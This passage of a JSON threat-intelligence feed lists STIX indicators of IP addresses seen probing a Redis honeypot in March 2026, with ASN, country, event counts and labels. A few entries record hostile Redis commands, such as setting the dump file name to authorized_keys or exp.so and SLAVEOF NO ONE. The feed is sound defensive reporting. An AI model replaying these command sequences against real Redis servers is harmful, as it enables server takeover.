      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T17:25:06.000Z",
      "valid_until": "2026-04-30T17:25:04.000Z"
    },
    {
      "created": "2026-03-29T17:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=7; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--ac3441f0-70f3-40c2-a892-e8e30491e2e3",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T17:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.186.241']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T17:25:06.000Z",
      "valid_until": "2026-04-30T17:25:04.000Z"
    },
    {
      "created": "2026-03-29T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--bb07f921-22f0-441d-8559-2c12fc44804c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '134.33.66.164']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T20:25:13.000Z",
      "valid_until": "2026-04-30T20:25:12.000Z"
    },
    {
      "created": "2026-03-29T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--e60512a9-cbc4-4043-ba51-3e0bab64de5d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.242']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T20:25:13.000Z",
      "valid_until": "2026-04-30T20:25:12.000Z"
    },
    {
      "created": "2026-03-29T21:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--31de5499-ca54-484e-bd08-6c8659f037dd",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T21:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '124.220.227.161']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T21:25:15.000Z",
      "valid_until": "2026-04-30T21:25:13.000Z"
    },
    {
      "created": "2026-03-30T01:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--cab66a11-a933-497b-b5b0-c4b433811a6b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-30T01:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.195.153']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T01:25:06.000Z",
      "valid_until": "2026-05-01T01:25:04.000Z"
    },
    {
      "created": "2026-03-30T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--519a06d3-ba5f-4873-ac7a-0e0582a9f0ad",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-30T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '115.190.189.213']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T03:25:13.000Z",
      "valid_until": "2026-05-01T03:25:12.000Z"
    },
    {
      "created": "2026-03-30T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=MD; asn=43289; asn_org=Trabia SRL; redis_cmd_hits=0",
      "id": "indicator--fe7d522b-20b1-4735-bf46-63c4a4214c79",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-30T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '178.175.135.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T04:25:13.000Z",
      "valid_until": "2026-05-01T04:25:12.000Z"
    },
    {
      "created": "2026-03-30T05:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=2155; ports=6379; cc=HK; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; cats=Misc activity; redis_cmds=config set dbfilename dump.rdb,config set rdbcompression yes,config set rdbcompression no,CONFIG SET dbfilename exp.so,config set dbfilename authorized_keys; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--69dcbc73-95a1-401b-b56b-13ceaa5be484",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-30T05:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '118.193.35.63']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T05:25:14.000Z",
      "valid_until": "2026-05-01T05:25:12.000Z"
    },
    {
      "created": "2026-03-30T06:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--9f3e13f6-3587-4f5b-a7d1-0c2cce809fda",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-30T06:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '142.93.2.42']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T06:25:04.000Z",
      "valid_until": "2026-05-01T06:25:02.000Z"
    },
    {
      "created": "2026-03-30T06:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--e6d9f617-0adb-4be7-97a7-4ed27fd6d450",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-30T06:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '199.45.154.180']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T06:25:04.000Z",
      "valid_until": "2026-05-01T06:25:02.000Z"
    },
    {
      "created": "2026-03-30T06:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--00b17378-4b1b-4279-87d4-13f103e68b1a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-30T06:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '199.45.155.79']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T06:25:04.000Z",
      "valid_until": "2026-05-01T06:25:02.000Z"
    },
    {
      "created": "2026-03-30T06:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--b792b865-d3ac-4d69-a8f3-a3c7bcf56945",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-30T06:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.84.145.61']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T06:25:04.000Z",
      "valid_until": "2026-05-01T06:25:02.000Z"
    },
    {
      "created": "2026-03-30T07:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=NL; asn=20857; asn_org=Signet B.V.; redis_cmd_hits=0",
      "id": "indicator--3f4af958-738d-4f6d-ba88-34a80923019d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-30T07:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '136.144.253.66']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T07:25:06.000Z",
      "valid_until": "2026-05-01T07:25:02.000Z"
    },
    {
      "created": "2026-03-30T09:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--a8155bae-7f6a-4adc-9413-7ecdd4ec4a68",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-30T09:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '209.38.81.211']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T09:25:14.000Z",
      "valid_until": "2026-05-01T09:25:12.000Z"
    },
    {
      "created": "2026-03-30T10:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=25; ports=6379; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0",
      "id": "indicator--ce9acd48-bb0c-48d6-8d6d-c8e6594255e0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-30T10:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '209.38.92.228']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T10:25:15.000Z",
      "valid_until": "2026-05-01T10:25:12.000Z"
    },
    {
      "created": "2026-03-30T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--af43d554-3043-4c02-910a-cd085493fdb2",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-30T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '116.153.32.50']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T11:25:13.000Z",
      "valid_until": "2026-05-01T11:25:12.000Z"
    },
    {
      "created": "2026-03-30T13:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--d9839e3a-590f-4db1-9cbc-ab01c980b7d4",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-30T13:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '52.249.38.143']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T13:25:08.000Z",
      "valid_until": "2026-05-01T13:25:06.000Z"
    },
    {
      "created": "2026-03-30T14:25:37.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--f1ec5304-3ec8-4bf8-acef-6df427d74888",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-30T14:25:37.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.156.80']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T14:25:37.000Z",
      "valid_until": "2026-05-01T14:25:12.000Z"
    },
    {
      "created": "2026-03-30T14:25:37.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--2a206bc8-66a4-4dc8-9fd6-39c28f66d4c4",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-30T14:25:37.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.156.83']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T14:25:37.000Z",
      "valid_until": "2026-05-01T14:25:12.000Z"
    },
    {
      "created": "2026-03-30T21:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=34; ports=6379; cc=CN; asn=148981; asn_org=China Telecom; redis_cmds=SLAVEOF NO ONE,CONFIG SET dbfilename exp.so,config set dbfilename dump.rdb,config set dbfilename root,save; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--e6875809-9890-4527-91f2-530f5a0b2d34",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-30T21:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '111.180.139.42']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T21:25:03.000Z",
      "valid_until": "2026-05-01T21:25:02.000Z"
    },
    {
      "created": "2026-03-30T21:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=3; ports=6379; cc=MD; asn=200019; asn_org=Alexhost Srl; redis_cmd_hits=0",
      "id": "indicator--431fe11a-3039-4708-bb6f-d0385f91ad9e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-30T21:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '213.232.235.104']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T21:25:03.000Z",
      "valid_until": "2026-05-01T21:25:02.000Z"
    },
    {
      "created": "2026-03-30T22:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--0ec50c06-f303-43b1-b311-19122e4435c1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-30T22:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.108']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T22:25:03.000Z",
      "valid_until": "2026-05-01T22:25:02.000Z"
    },
    {
      "created": "2026-03-30T23:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--56a6b178-8869-4298-aed9-95b39a927f6e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-30T23:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.195.157']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-30T23:25:03.000Z",
      "valid_until": "2026-05-01T23:25:01.000Z"
    },
    {
      "created": "2026-03-31T02:35:35.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--3527d6a9-dd1d-4bac-9f76-9d1a67d3356c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T02:35:35.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '137.184.210.142']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T02:35:35.000Z",
      "valid_until": "2026-05-02T02:35:33.000Z"
    },
    {
      "created": "2026-03-31T02:35:35.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--3e405b0a-f653-4ae7-8646-6f702b7fb403",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T02:35:35.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.230.232.186']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T02:35:35.000Z",
      "valid_until": "2026-05-02T02:35:33.000Z"
    },
    {
      "created": "2026-03-31T02:35:35.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=KE; asn=36914; asn_org=Kenya Education Network; redis_cmd_hits=0",
      "id": "indicator--a934b79b-0d51-42cf-83d0-eb784cf43673",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T02:35:35.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '41.89.92.150']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T02:35:35.000Z",
      "valid_until": "2026-05-02T02:35:33.000Z"
    },
    {
      "created": "2026-03-31T03:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--71c90c26-7ceb-42bd-a088-38a51efcdbca",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T03:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.195.145']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T03:25:03.000Z",
      "valid_until": "2026-05-02T03:25:02.000Z"
    },
    {
      "created": "2026-03-31T04:26:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--23a43940-c5b3-4584-9aed-4f5a17b1ba1d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T04:26:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '81.71.51.170']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T04:26:13.000Z",
      "valid_until": "2026-05-02T04:25:47.000Z"
    },
    {
      "created": "2026-03-31T05:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--cfd5e92e-fa06-4f7c-8899-a13c382a809f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T05:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '120.48.134.61']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T05:25:02.000Z",
      "valid_until": "2026-05-02T05:25:01.000Z"
    },
    {
      "created": "2026-03-31T06:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--8ea1b887-a849-4f98-bc15-ae3fc08436a4",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T06:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '118.212.120.238']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T06:25:05.000Z",
      "valid_until": "2026-05-02T06:25:04.000Z"
    },
    {
      "created": "2026-03-31T06:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--ab7d5e0d-4f85-4b80-895b-a3a7d099dd4e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T06:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '123.144.24.254']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T06:25:05.000Z",
      "valid_until": "2026-05-02T06:25:04.000Z"
    },
    {
      "created": "2026-03-31T06:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--50072f77-0902-4483-8988-278db01a67f1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T06:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '124.117.192.124']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T06:25:05.000Z",
      "valid_until": "2026-05-02T06:25:04.000Z"
    },
    {
      "created": "2026-03-31T06:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--800d1911-cb9e-4129-91dd-097e180f8751",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T06:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '144.123.77.157']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T06:25:05.000Z",
      "valid_until": "2026-05-02T06:25:04.000Z"
    },
    {
      "created": "2026-03-31T06:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--3e485a29-2db1-4d2f-9585-fac1c786a5d7",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T06:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '171.116.47.209']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T06:25:05.000Z",
      "valid_until": "2026-05-02T06:25:04.000Z"
    },
    {
      "created": "2026-03-31T06:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--4d1106b1-9c14-4ff8-9449-0ed540889519",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T06:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '221.207.34.202']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T06:25:05.000Z",
      "valid_until": "2026-05-02T06:25:04.000Z"
    },
    {
      "created": "2026-03-31T06:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--c4f2ed1e-23f5-452a-bb9f-82fcaf1fd108",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T06:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '58.19.79.111']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T06:25:05.000Z",
      "valid_until": "2026-05-02T06:25:04.000Z"
    },
    {
      "created": "2026-03-31T06:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--3fadb1eb-937e-48d6-9004-0e3a5d73f073",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T06:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.186.199']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T06:25:05.000Z",
      "valid_until": "2026-05-02T06:25:04.000Z"
    },
    {
      "created": "2026-03-31T08:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=EC; asn=27947; asn_org=Telconet S.A; redis_cmd_hits=0",
      "id": "indicator--43431d1b-3d32-4b9b-b618-a6d4ca45f6a8",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T08:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '186.3.217.69']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T08:25:03.000Z",
      "valid_until": "2026-05-02T08:25:02.000Z"
    },
    {
      "created": "2026-03-31T08:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--7807ee21-7c6f-454e-bbf3-8e8852e462bc",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T08:25:03.000Z",
